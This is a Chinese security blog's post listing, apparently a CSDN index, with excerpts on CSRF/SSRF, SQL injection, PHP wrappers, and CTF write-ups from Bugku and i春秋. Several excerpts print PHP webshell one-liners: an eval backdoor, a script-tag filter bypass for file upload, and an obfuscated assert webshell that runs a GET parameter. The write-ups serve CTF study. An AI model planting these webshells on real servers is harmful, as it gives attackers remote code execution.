- 博客(11)
- 资源 (1)
- 收藏
- 关注
原创 CSRF&SSRF简析
跨站请求伪造,是一种对网站的恶意利用。XSS利用站点内地信任用户,而CSRF通过伪装来自信任用户的请求来利用受信任的网站。与XSS相比,CSRF攻击往往不大流行(因此对其防范的资源也相对较少)和难以防范,所以被认为比XSS更具危险性。一个场景,跨域发出了一个请求,可以无JavaScript参加,请求是身份认证后的。一般分为HTML CSRF,JOSN HiJacking攻击和Flash CSRF。...
2019-10-19 08:28:53 663
原创 SQL注入
SQL注入漏洞主流的数据库SQL注入原理SQL注入攻击的本质,服务端没有过滤用户输入的恶意数据,直接把它当成SQL命令来执行了,从而影响数据库安全和平台安全。两个条件用户能够控制输入;原本程序要执行的SQL语句,拼接了用户输入的恶意数据。导致的危害造成的原因SQL注入方法...
2019-10-15 09:02:52 447
原创 i春秋 web“百度杯”CTF比赛 九月场-Upload & code
“百度杯”CTF比赛 九月场Upload可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话:<?php@eval($POST["code"]);?>结果发现<?php被过滤了,于是用php脚本标记来绕过过滤:<script language="PHP">$fh=fopen("../flag.".strtolower("PHP"),'r...
2019-10-13 17:30:26 1004
原创 PHP伪协议
感觉web里面还会经常遇到php伪协议的,总结一下。php支持的协议如下:file:// — 访问本地文件系统http://— 访问Http(s)网址ftp://— 访问ftp(s) urlsphp:// — 访问各个输入/输出流(I/O streams)zlib:// — 压缩流data:// — 数据(RFC 2397)glob:// — 查找匹配的文件路径模式phar:/...
2019-10-09 20:45:42 172
原创 二刷bugku web
过狗一句话首先题目给了一段话,送给大家一个过狗一句话<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>...
2019-10-09 20:04:00 289
原创 攻防世界杂项 gif
下载压缩包下来,有两个文件夹,其中_MACOSX中有个图片,不过损坏了不能查看,gif里面有104张(0-103)黑白图片,黑白联想到二进制,白对应0,黑对应1,然后二进制转为字符串,运行脚本就OKwhite = open('C:/Users/Downloads/gif/0.jpg', 'rb').read()black = open('C:/Users/Downloads/gif/1....
2019-10-08 17:10:27 831
原创 Hosts文件
hosts文件是用于存储具有关联IP地址的主机名的文本文件,其中确定了在网络中访问哪些节点。hosts文件可将主机名转换为IP地址。hosts文件在PC,Mac和移动设备的所有常用操作系统中创建,可由管理员修改。每次访问网站时,设备都会先检查hosts文件来查找该网站的相应条目或规则。hosts文件是什么?首先,hosts文件是过去的遗留物。在互联网的早期,该文件用于将域名链接到某些IP地址...
2019-10-08 16:14:48 471
原创 Bugku杂项 wp2
闪的好快gif动图,用stegsolve打开,然后Analysis->Frame Browser。共有18帧,拿着手机一张一张扫,扫出来的结果是SYC{F1aSh-so-f4sT}但是提交不正确。最后更改为SYC{F1aSh_so_f4sT}come_game下载下来,发现是一个游戏运行.exe文件,进入游戏界面,按照界面提示,shift键和上下左右键控制游戏随便玩一下,E...
2019-10-04 00:44:52 346
原创 Bugku杂项 wp1
这是一张单纯的图片用winhex打开,发现一些不正常的编码,http://tool.chinaz.com/tools/unicode.aspxASCII转Unicode一下,得到key{you are right}隐写图片第二行第2,3列是图片宽,6,7列是高,把第六列01改为11,保存下来,即可看到flag。telnet...
2019-10-03 14:59:29 2120
原创 Java中的序列化和反序列化
引言众所周知,类的对象会随着程序的终止而被垃圾收集器销毁。如果要在不重新创建对象的情况下调用该类,该怎么做?这就可以通过序列化将数据转换为字节流。对象序列化是一个用于将对象状态转换为字节流的过程,可以将其保存到磁盘文件中或通过网络发送到任何其他程序;从字节流创建对象的相反的过程称为反序列化。而创建的字节流是与平台无关的,在一个平台上序列化的对象可以在不同的平台上反序列化。如何使Java类可序...
2019-10-02 10:55:29 128
DekartPrivateDisk_210.zip
2020-05-16
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人